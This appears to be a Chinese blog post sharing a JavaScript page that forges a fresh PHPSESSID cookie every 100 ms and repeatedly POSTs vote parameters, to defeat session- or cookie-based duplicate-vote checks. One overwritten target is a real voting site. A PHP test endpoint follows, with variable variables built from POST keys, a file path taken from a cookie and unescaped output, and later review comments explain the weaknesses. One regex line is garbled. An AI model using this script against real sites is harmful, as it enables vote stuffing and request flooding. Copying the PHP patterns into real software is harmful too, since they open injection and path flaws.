                如果是基于session或者cookie做防止刷新,那么,我可以偽造狀態,用xmlhttp把服務器刷爆 代碼如下,服務器端的代碼在最后一個
```
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title> xmlhttp</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script language="javascript" type="text/javascript" src="fckXML.js"></script>
<script language="javascript" type="text/javascript">
<!--
/*
 * Author's test page: a timer calls zuobiStart() every 100 ms, and each call
 * replaces the PHPSESSID cookie with a random value and POSTs `params` to
 * `urlToCall`. It demonstrates that duplicate-submission checks kept only in
 * session or cookie state are controlled by the client.
 *
 * Defensive reading: a marker the client stores (a session id, a counter
 * cookie) can be discarded or replaced by that client, so it cannot be the
 * only control against repeated submissions. Enforce the limit on state the
 * server owns, for example an authenticated account, a server-issued
 * single-use token, a per-source rate limit, or a challenge step.
 */

/* Writes a cookie whose `expires` value is the current time; not called anywhere in this listing. */
function SetCookie(sName, sValue) {
  date = new Date();
  document.cookie = sName + "=" + escape(sValue) + "; expires=" + date.toGMTString();
}

/* Pick whichever XMLHttpRequest implementation the browser offers. */
if ( window.XMLHttpRequest ) // Gecko
  oXmlHttp = new XMLHttpRequest() ;
else if ( window.ActiveXObject ) // IE
  oXmlHttp = new ActiveXObject("MsXml2.XmlHttp") ;

/*
 Author's notes (translated):
 After looking at and analysing the server-side output, spoofing the IP through xmlhttp is not possible.
 setRequestHeader sets individual HTTP request headers, and the client IP is not one of them. If the
 server prevents repeat submissions by IP, don't bother, unless you write a socket program in C that
 builds custom IP packets and can make sure the headers are not rewritten by a gateway.
 If the server is ASP with session-based checks, well, what then? Write a socket program in C? I do not
 know how to forge that.
 If the server is PHP and prevents repeats with a session or a cookie, then I am fine.
 Next step: understand the ASP session mechanism. It does not rely on cookies anyway. I am out of
 options unless I look for a C solution.
*/

/* Only the last assignment takes effect; the two earlier values are overwritten. */
urlToCall = "http://toupiao.scol.com.cn/toupiao_save.asp";
urlToCall = "http://develop-3/test/jstest/xmlhttp/server.php";
urlToCall = "http://test.bai.com/jstest/xmlhttp/server.php";
host = "test.bai.com";
var bAsync = 1 ;
result = '';
i = 1;
n = 2;

/* Timer callback: swap the session cookie, send one POST, append the response text to `result`. */
function zuobiStart() {
  // open the URL
  oXmlHttp.open( "POST", urlToCall, bAsync ) ;
  // forge the session id to fool the server: the server-side session for this exchange is replaced,
  // so all session state loses its meaning
  phpsessid = Math.random();
  id2 = Math.random();
  phpsess = phpsessid.toString()+'11111'+id2.toString();
  // NOTE(review): the regex literal on the next line is garbled in this copy of the page; left as printed.
  phpsess = phpsess.replace( //./g,"0" );
  phpsess = phpsess.substr( 0,32 );
  cook ="PHPSESSID="+phpsess+"; ";
  // set PHPSESSID; PHP sessions are implemented through a cookie, so this refreshes the session for this exchange
  document.cookie=cook;
  // headers below can be modified
  // NOTE(review): whether a header can be set is decided by the browser, not by the protocol. A server
  // must not treat User-Agent, Referer, Host or similar request headers as evidence of who is calling,
  // because a non-browser client can send any value.
  oXmlHttp.setRequestHeader ( "ADDR000", 'test' );
  oXmlHttp.setRequestHeader ( "User-Agent", "Mozilla/4.0 " );
  oXmlHttp.setRequestHeader( "accept-language", "zh_cn");
  oXmlHttp.setRequestHeader( "CONTENT-TYPE","application/x-www-form-urlencoded");
  oXmlHttp.setRequestHeader( "accept-encoding", "gzip, deflate");
  oXmlHttp.setRequestHeader( "CONNECTION", "keep-alive");
  oXmlHttp.setRequestHeader( "accept", "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
  // headers below cannot be modified; even if changed, the server does not honour them
  oXmlHttp.setRequestHeader( "Referer", 'example.test.com');
  oXmlHttp.setRequestHeader ("Cookie", cook);
  oXmlHttp.setRequestHeader ("HOST", host );
  oXmlHttp.setRequestHeader( "content-length", "11");
  oXmlHttp.setRequestHeader( "CACHE_CONTROL", "kcache");
  params = 'item_button=45&topic=5';
  // send the test data
  oXmlHttp.send(params) ;
  // collect the returned result
  oXmlHttp.onreadystatechange = function() {
    if ( oXmlHttp.readyState == 4 ) {
      result += oXmlHttp.responseText;
    }
  }
  // NOTE(review): in this collapsed copy it is unclear whether `i++;` was live code or commented out; kept as printed.
  // i++;
  // leave the loop
  if (i>n){
    //alert("end/n"+i.toString()+"/n"+n.toString());
    infoObj = document.getElementById('info');
    infoObj.value = result;
    //info.value = result+"慰問慰問";
    clearInterval(flushtimerID);
  }
}//end func
// end
flushtimerID = window.setInterval(zuobiStart,100);
//-->
</script>
</head>
<body>
<textarea name="info" id="info" rows="10" cols="90" >
```
```<?php
// Author's test endpoint: rejects a second request in the same session, keeps a counter in a
// cookie, then echoes the POST body and the $_SERVER array back to the caller.
//
// NOTE(review): the only duplicate-submission control here is $_SESSION['posted']. The session is
// selected by the PHPSESSID cookie the client sends, so a client that presents a different session
// id starts with an empty session and passes the check. The currNum cookie is likewise
// client-controlled. Neither is a server-owned record of who has already submitted.
require_once('echo.php');
session_start();
//pr($_COOKIE);pr($_GET);pr($_POST);
//pr($_SESSION);pr($_COOKIE);
// Refuse the request if this session has already posted once.
if ( $_SESSION['posted'] == 1 ) {
  echo"error";
  DIE;
}
//get cookie number
// NOTE(review): read before the isset() check below, and never validated. The value later becomes
// part of a file path; it should be restricted to digits (for example with an integer cast) first.
$num = $_COOKIE['currNum'];
$expires = time()+60*60*24*365;
if (!isset($_COOKIE['currNum'])) {
  setcookie('currNum' , 1 , $expires );
  // NOTE(review): "/n" here and "/r/n" below are literal slashes as printed; presumably backslash
  // escapes were lost when the page was rendered.
  echo "cookie沒有設置/n";
} else {
  $num++;
  setcookie('currNum',$num);
  echo $num;
}
?>
<style type="text/css"> *{font:12px verdana;} </style>
<pre>
<?php
foreach ($_POST as $key=>$v) {
  // NOTE(review): a variable variable built from a POST key lets any request overwrite script
  // variables such as $num or $str (the same class of problem as register_globals). Read the
  // expected keys explicitly instead.
  $$key = $v;
  // $str is appended to without being initialised first.
  $str .=$v."/r/n";
  //echo "$v /n";
}
//print_R($_SERVER);
foreach ($_SERVER as $k=>$v) {
  $str .=$k."=".$v."/n";
}
// NOTE(review): request values and the server environment are written into the HTML response
// unescaped; outside a throwaway test box this discloses server details and should go through
// htmlspecialchars().
echo $str;
// NOTE(review): $num comes from a cookie (or from the POST loop above) and is concatenated into the
// path unchecked, and mode "wb" creates or truncates the file. Validate $num before building the
// path. With fwrite() commented out, the file is left empty.
$fp = fopen("d:/tmp/".$num.".txt","wb");
//fwrite($fp,$str);
fclose($fp);
// Mark this session as having posted; checked at the top of the script on the next request.
$_SESSION['posted'] = 1;
?>
```